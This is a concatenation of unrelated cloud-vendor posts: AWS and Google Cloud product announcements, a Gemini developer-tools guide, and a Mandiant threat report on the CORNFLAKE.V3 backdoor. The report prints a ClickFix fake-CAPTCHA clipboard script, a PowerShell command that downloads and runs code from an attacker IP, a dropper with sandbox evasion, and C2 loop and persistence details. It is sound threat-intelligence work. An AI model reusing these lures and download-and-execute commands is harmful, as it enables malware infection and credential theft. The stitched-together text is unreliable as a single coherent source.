AWS Security Incident Response is now Health Information Trust Alliance Common Security Framework (HITRUST CSF) certified, demonstrating its alignment with stringent security and privacy requirements established by HITRUST for managing sensitive data. This certification validates that AWS Security Incident Response meets comprehensive security controls required by healthcare, life sciences and many other regulated sectors.
HITRUST CSF is a comprehensive security and privacy framework developed by the HITRUST Alliance to help organizations in the healthcare industry and other regulated sectors effectively manage information risk and comply with a variety of security, privacy and regulatory requirements. It provides a scalable, transparent, and certifiable approach based on well-known industry standards and regulations, allowing organizations to demonstrate their commitment to protecting sensitive data and meeting compliance obligations. AWS customers can achieve HITRUST certification using AWS products and inherit AWS HITRUST scores, reducing the audit burden for both parties. Visit the AWS Services in Scope by Compliance Program to see a full list of services also covered by HITRUST.
AWS Security Incident Response automates security alert monitoring, streamlines incident response coordination, and provides direct access to 24/7 security experts, enabling organizations to efficiently detect, investigate, and mitigate security incidents. To learn more, see the AWS Security Incident Response documentation. Get started today by visiting AWS Security Incident Response via the console, AWS Command Line Interface, or APIs.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some traveler’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code on GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and JetBrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using Nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically (see the sketch after this list)
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
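For the programmatic path mentioned above, here is a minimal, hedged Python sketch using the google-genai SDK with an AI Studio API key; the API key and model name are placeholders you would substitute with your own values.
# Minimal sketch: call a Gemini model with an API key from Google AI Studio.
# Assumes the google-genai Python SDK (pip install google-genai); the key and
# model name below are placeholders and may need to be updated.
from google import genai

client = genai.Client(api_key="YOUR_AI_STUDIO_API_KEY")  # placeholder key
response = client.models.generate_content(
    model="gemini-2.0-flash",  # substitute a current model name
    contents="Summarize the difference between Jules and the Gemini CLI.",
)
print(response.text)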
Cheatsheet:
Choose the Gemini app for quick app prototyping
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drifts and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting from the library Cloud Controls. You can also create custom Cloud Controls either manually or with help from Compliance Manager’s GenAI based control authoring feature, providing quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include differentiated, advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity and provides a native platform experience.
DSPM starts with a data map that offers a bird's-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery can help you apply policies to monitor and secure your data, allowing curated controls to be matched with your sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance
Using data access governance controls, you can govern access to sensitive data and restrict access, in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance
Using data flow controls, you can restrict, in detective mode, how data moves across country boundaries, to help ensure that sensitive customer data does not leave a country boundary. As an example, consider an organization operating in a specific country that has a compliance requirement to keep customer data within the country's geographic boundary. With data flow governance, the organization can create a policy that only allows data to flow within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection
Data protection controls can help manage encryption key configuration, such as enforcing customer-managed encryption keys (CMEK). You can create a policy that enforces CMEK on the keys protecting sensitive data.
Data deletion
Using data deletion controls, you can manage the maximum duration for which data is retained. You can create a policy with an allowed maximum retention period and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or greater. Today, you can configure it with either gcloud CLI or API. Terraform and UI support is coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings. Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and down on demand, optimizing IP address allocation and reducing the administrative overhead of cluster operations. Try it today!
Amazon Managed Service for Apache Flink now supports AWS Key Management Service (AWS KMS) customer managed keys (CMKs). Amazon Managed Service for Apache Flink has always provided encryption by default using AWS-owned KMS keys. Now, customers have the option to use their own customer managed keys, providing greater control over how data stored in Amazon Managed Service for Apache Flink is encrypted.
Amazon Managed Service for Apache Flink simplifies the development and operation of real-time data stream processing applications by eliminating the complexity of managing Flink infrastructure. Apache Flink is an open source framework and engine for processing data streams.
For Amazon Managed Service for Apache Flink region availability, refer to the AWS Region Table.
For detailed information about implementing Customer Managed Keys in Amazon Managed Service for Apache Flink, visit our documentation.
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP (PHP Variant) that retrieves payloads via HTTP. Supported payload types include shell commands, executables and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
Malware Family | CORNFLAKE | CORNFLAKE.V2 | CORNFLAKE.V3
Language | C | JS | JS or PHP
Type | Downloader | Downloader | Backdoor
C2 Communication | TCP socket (XOR encoded) | HTTP (XOR encoded) | HTTP (XOR encoded)
Payload types | DLL | DLL, EXE, JS, BAT | DLL, EXE, JS, BAT, PS
Persistence | No | No | Registry Run key
Table 1: Comparison of CORNFLAKE malware variants
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+R shortcut. Evidence of this activity was found in the HKEY_USERS\<User>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRU registry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in Figure 2, the user was lured into pasting into the Windows Run dialog box a hidden script that the malicious web page automatically copied to the clipboard when the user clicked the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c \"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex\"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
};
The PowerShell command copied to the clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $u is the UNIX epoch timestamp of the download, rounded down to a multiple of 16 seconds by the -band 0xfffffffffffffff0 mask.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432 (a UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low (possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern (possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`"" -WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%\downloaded.zip and extract its contents to the directory %APPDATA%\node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%\node-v22.11.0-win-x64\node.exe -e "<base64_decoded_CORNFLAKE.v3>"
The PowerShell dropper’s anti-VM checks include checking for low system resources (total memory less than 4 GB or used memory less than 1.5 GB), whether the target system’s computer name matches the regular expression DESKTOP-S*, and whether the system manufacturer is QEMU.
As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5: e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%\node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
The extracted %APPDATA%\node-v22.11.0-win-x64\node.exe binary was then launched by PowerShell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:\users\<user>\appdata\roaming\node-v22.11.0-win-x64\node.exe -e "{CORNFLAKE.V3}"
↳ c:\windows\system32\windowspowershell\v1.0\powershell.exe -c "{Initial check and System Information Collection}"
↳ C:\Windows\System32\ARP.EXE -a
↳ C:\Windows\System32\chcp.com 65001
↳ C:\Windows\System32\systeminfo.exe
↳ C:\Windows\System32\tasklist.exe /svc
↳ c:\windows\system32\cmd.exe /d /s /c "wmic process where processid=16004 get commandline"
↳ C:\Windows\System32\cmd.exe /d /s /c "{Kerberoasting}"
↳ c:\windows\system32\cmd.exe /d /s /c "{Active Directory Reconnaissance}"
↳ c:\windows\system32\cmd.exe /d /s /c "reg add {ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, a check verifies the command-line arguments of the node.exe process. Because the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process that has 1 as an additional argument, after which the initial node.exe exits. When the child process runs, it now has three arguments, so it passes this initial check and executes the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
Following this, the malware collects system information.
The collection routine executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloop function. The script contains support for two separate lists, hosts and hostsIp, which are both used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in the hosts list; if unable to do so, it attempts to connect to a random IP address in the hostsIp list instead. Once a connection is successfully established, the main function is called.
// Define lists of hostnames and IP addresses for the command and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
This request is answered by the C2 with 2 possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
If the response does not match one of those two values, the malware interprets the response as a payload and, after XOR decrypting it, parses the last byte of the response. The following values are accepted by the program (a simplified sketch of the encoding and dispatch scheme follows the table):
Command | Type | Description
0 | EXE | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.exe and launched using the Node.js child_process.spawn() function.
1 | DLL | The received payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.dll and launched using the Node.js child_process.spawn() function as an argument to rundll32.exe.
2 | JS | The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn() function.
3 | CMD | The received payload is launched from memory as an argument to cmd.exe using the Node.js child_process.spawn() function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.
4 | Other | The payload is written to %APPDATA%\<random_8_chars>\<random_8_chars>.log.
Table 2: CORNFLAKE.V3 supported payloads
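The XOR encoding and last-byte dispatch described above can be summarized with a short sketch. This is not CORNFLAKE.V3's actual code (the real implant is Node.js, and its key and framing are not reproduced here); it is a generic Python illustration, with an assumed key and handler labels, of how a repeating-key XOR channel and a trailing command byte work together.
# Illustrative only: generic repeating-key XOR plus last-byte dispatch,
# mirroring the behavior described for CORNFLAKE.V3. The key, framing, and
# handler descriptions are assumptions, not recovered malware constants.
KEY = b"example-key"  # placeholder key

def xor(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def dispatch(response: bytes) -> str:
    """Decode a C2 response and classify it by its trailing command byte."""
    decoded = xor(response)
    command = decoded[-1]  # the payload itself would be decoded[:-1]
    handlers = {
        0: "write payload to disk as .exe and execute",
        1: "write payload to disk as .dll and run via rundll32.exe",
        2: "run payload in memory via node.exe",
        3: "run payload via cmd.exe and capture output",
        4: "write payload to a .log file",
    }
    return handlers.get(command, "unknown command")

# Example: a fake response whose decoded last byte is 3 (CMD).
print(dispatch(xor(b"whoami /all" + bytes([3]))))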
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdater under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument to node.exe in the newly created ChromeUpdater registry key. This ensures that the malware executes upon user logon.
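To make the described Run-key persistence concrete for defenders, here is a small, hedged Python sketch (Windows-only, standard-library winreg) that lists HKCU Run values and flags entries matching the pattern above: node.exe running a .log script out of %APPDATA%. It is a triage aid written for illustration, not part of the malware or of any Mandiant tooling.
# Hypothetical triage helper: enumerate HKCU Run values and flag entries that
# match the pattern described above (node.exe from %APPDATA% executing a .log
# file). Windows-only; uses only the Python standard library.
import os
import winreg

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
appdata = os.environ.get("APPDATA", "").lower()

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
    index = 0
    while True:
        try:
            name, value, _type = winreg.EnumValue(key, index)
        except OSError:
            break  # no more values under the Run key
        index += 1
        lowered = str(value).lower()
        suspicious = (
            "node.exe" in lowered
            and bool(appdata) and appdata in lowered
            and ".log" in lowered
        )
        print(f"[{'SUSPICIOUS' if suspicious else 'ok'}] {name}: {value}")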
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script first determines whether the host is domain-joined; this condition determines which reconnaissance path is executed.
Domain Joined
